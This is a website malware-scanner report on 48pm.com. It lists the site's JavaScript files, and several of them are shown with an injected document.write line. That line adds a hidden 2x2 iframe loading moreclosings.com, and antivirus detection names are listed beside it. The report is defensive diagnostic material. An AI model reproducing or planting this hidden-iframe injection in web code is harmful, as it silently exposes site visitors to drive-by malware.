New scan:

Malware Scanner report for 48pm.com

Malicious/Suspicious/Total urls checked
5/0/15
5 pages have malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/11/11
11 suspicious iframes found. See details below
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://www.48pm.com/
200 OK
Content-Length: 32756
Content-Type: text/html
clean
http://www.48pm.com/js/loadevent.js
200 OK
Content-Length: 396
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function addLoadEvent(func) {
var oldonload = window.onload;
if (typeof window.onload != 'function') {
window.onload = func;
} else {
window.onload = function() {
if (oldonload) {
oldonload();
}
func();
}
}
}
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://moreclosings.com/showthread.php?sid=276998></iframe>');

Antivirus reports:

Norman
Iframe.UW

Hidden iFrame found.
size: 2x2     
src: http://moreclosings.com/showthread.php?sid=276998

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://moreclosings.com/showthread.php?sid=276998>

http://www.48pm.com/js/styleswitcher.js
200 OK
Content-Length: 8487
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function getAllSheets() {
if( !window.ScriptEngine && navigator.__ice_version ) { return document.styleSheets; }
if( document.getElementsByTagName ) { var Lt = document.getElementsByTagName('link'), St = document.getElementsByTagName('style');
} else if( document.styleSheets && document.all ) { var Lt = document.all.tags('LINK'), St = document.all.tags('STYLE');
} else { return []; } for( var x = 0, os = []; Lt[x]; x++ ) {
var rel = Lt[x].rel ? Lt[x].rel
... 3787 bytes are skipped ...
{
$('more_'+i).style.display = '';
$('link_'+i).innerHTML = 'less <img src=\"http://www.originalsignal.com/images/less.gif\" alt=\"fold\" />';
}
}
}
}
function setStyle()
{
if (getCookie('fontsize') == 'big')
{
changeStyle('big');
}

}
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://moreclosings.com/showthread.php?sid=276998></iframe>');

Antivirus reports:

Norman
Iframe.UW

Hidden iFrame found.
size: 2x2     
src: http://moreclosings.com/showthread.php?sid=276998

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://moreclosings.com/showthread.php?sid=276998>

http://www.48pm.com/js/prototype.js
200 OK
Content-Length: 55314
Content-Type: application/x-javascript
suspicious
Hidden iFrame found.
size: 2x2     
src: http://moreclosings.com/showthread.php?sid=276998

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://moreclosings.com/showthread.php?sid=276998>

http://www.48pm.com/js/scriptaculous.js
200 OK
Content-Length: 2412
Content-Type: application/x-javascript
suspicious
Hidden iFrame found.
size: 2x2     
src: http://moreclosings.com/showthread.php?sid=276998

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://moreclosings.com/showthread.php?sid=276998>

http://www.48pm.com/js/default.js
200 OK
Content-Length: 3942
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function setCookie(cookieName,cookieValue,nDays) {
var today = new Date();
var expire = new Date();
if (nDays==null || nDays==0) nDays=365;
expire.setTime(today.getTime() + 3600000*24*nDays);
document.cookie = cookieName+"="+escape(cookieValue)
+ ";expires="+expire.toGMTString();
}
function getCookie(name) {
var start = document.cookie.indexOf( name + "=" );
var len = start + name.length + 1;
if ((!start) && (name != do
... 3483 bytes are skipped ...
(screen.width - 460) / 2;
var wint = (screen.height - 450) / 2;
var thevars = 'resizable=yes,scrollbars=yes,status=0,menubar=no,width=460,height=450,top=' + wint + ',left=' + winl;

newwindow=window.open(url,'popup',thevars);
if (window.focus) {newwindow.focus()}
return false;
}

document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://moreclosings.com/showthread.php?sid=276998></iframe>');

Antivirus reports:

Norman
Iframe.UW

Hidden iFrame found.
size: 2x2     
src: http://moreclosings.com/showthread.php?sid=276998

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://moreclosings.com/showthread.php?sid=276998>

http://www.48pm.com/js/lightbox.js
200 OK
Content-Length: 6080
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

var detect = navigator.userAgent.toLowerCase();
var OS,browser,version,total,thestring;
function getBrowserInfo() {
if (checkIt('konqueror')) {
browser = "Konqueror";
OS = "Linux";
}
else if (checkIt('safari')) browser = "Safari"
else if (checkIt('omniweb')) browser = "OmniWeb"
else if (checkIt('opera')) browser = "Opera"
else if (checkIt('webtv')) browser = "WebTV";
else if (checkIt('icab')) browser = "iCab"
else if (checkIt('m
... 4273 bytes are skipped ...
overlay.id = 'overlay';
lb = document.createElement('div');
lb.id = 'lightbox';
lb.className = 'loading';
lb.innerHTML = '<div id="lbLoadMessage">' +
'<p>Loading</p>' +
'</div>';
bod.appendChild(overlay);
bod.appendChild(lb);
}
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://moreclosings.com/showthread.php?sid=276998></iframe>');

Antivirus reports:

AntiVir
JS/Redir.jea
Avast
JS:Redirector-FA [Trj]
Ikarus
Trojan.JS.Redir
nProtect
Trojan.JS.Redirector.ADM
Emsisoft
Trojan.JS.Redirector.ADM (B)
Comodo
TrojWare.JS.Redirect.sst
Microsoft
Trojan:JS/Redirector.EV
TotalDefense
JS/Redirector.BB
F-Secure
Trojan.JS.Redirector.ADM
Sophos
Mal/HappJS-A
GData
Trojan.JS.Redirector.ADM
ESET-NOD32
JS/TrojanDownloader.HackLoad.AE
BitDefender
Trojan.JS.Redirector.ADM

Hidden iFrame found.
size: 2x2     
src: http://moreclosings.com/showthread.php?sid=276998

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://moreclosings.com/showthread.php?sid=276998>

http://www.48pm.com/js/boxover2.js
200 OK
Content-Length: 11099
Content-Type: application/x-javascript
suspicious
Hidden iFrame found.
size: 2x2     
src: http://moreclosings.com/showthread.php?sid=276998

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://moreclosings.com/showthread.php?sid=276998>

http://www.48pm.com/js/menu.js
200 OK
Content-Length: 1145
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function makeActive(tab) {
el = document.getElementById(tab);

el.style.backgroundImage= 'url(http://www.originalsignal.com/images/bg_tab6.gif)';
el.style.height = '21px';
el.style.marginTop = '-4px';
el.style.paddingTop = '7px';

}
function hideActive(tab) {
el = document.getElementById(tab);

el.style.backgroundImage= '';

}
function showSub(id,subid) {

el = document.getElementById(subid);
el.style.visi
... 169 bytes are skipped ...
e.height = '21px';
tid.style.marginTop = '-4px';
tid.style.paddingTop = '7px';

}
function hideSub(id,subid) {

el = document.getElementById(subid);
el.style.visibility = 'hidden';

tid = document.getElementById(id);
tid.style.backgroundImage= '';

}
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://moreclosings.com/showthread.php?sid=276998></iframe>');

Antivirus reports:

Norman
Iframe.UW

Hidden iFrame found.
size: 2x2     
src: http://moreclosings.com/showthread.php?sid=276998

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://moreclosings.com/showthread.php?sid=276998>

http://www.48pm.com/js/fader.js
200 OK
Content-Length: 877
Content-Type: application/x-javascript
suspicious
Hidden iFrame found.
size: 2x2     
src: http://moreclosings.com/showthread.php?sid=276998

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://moreclosings.com/showthread.php?sid=276998>

http://www.48pm.com/js/beansmenu.js
200 OK
Content-Length: 773
Content-Type: application/x-javascript
suspicious
Hidden iFrame found.
size: 2x2     
src: http://moreclosings.com/showthread.php?sid=276998

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://moreclosings.com/showthread.php?sid=276998>

http://www.48pm.com/js/beanspopbox.js
200 OK
Content-Length: 4210
Content-Type: application/x-javascript
suspicious
Hidden iFrame found.
size: 2x2     
src: http://moreclosings.com/showthread.php?sid=276998

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://moreclosings.com/showthread.php?sid=276998>

http://pagead2.googlesyndication.com/pagead/show_ads.js
200 OK
Content-Length: 19470
Content-Type: text/javascript
clean
http://www.48pm.com/mobile
404 Not Found
Content-Length: 310
Content-Type: text/html
clean
http://www.48pm.com/test404page.js
404 Not Found
Content-Length: 318
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: 48pm.com

Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: 48pm.com
Referer: http://www.google.com/search?q=48pm.com

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=48pm.com

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://48pm.com/

Result: 48pm.com is not infected or malware details are not published yet.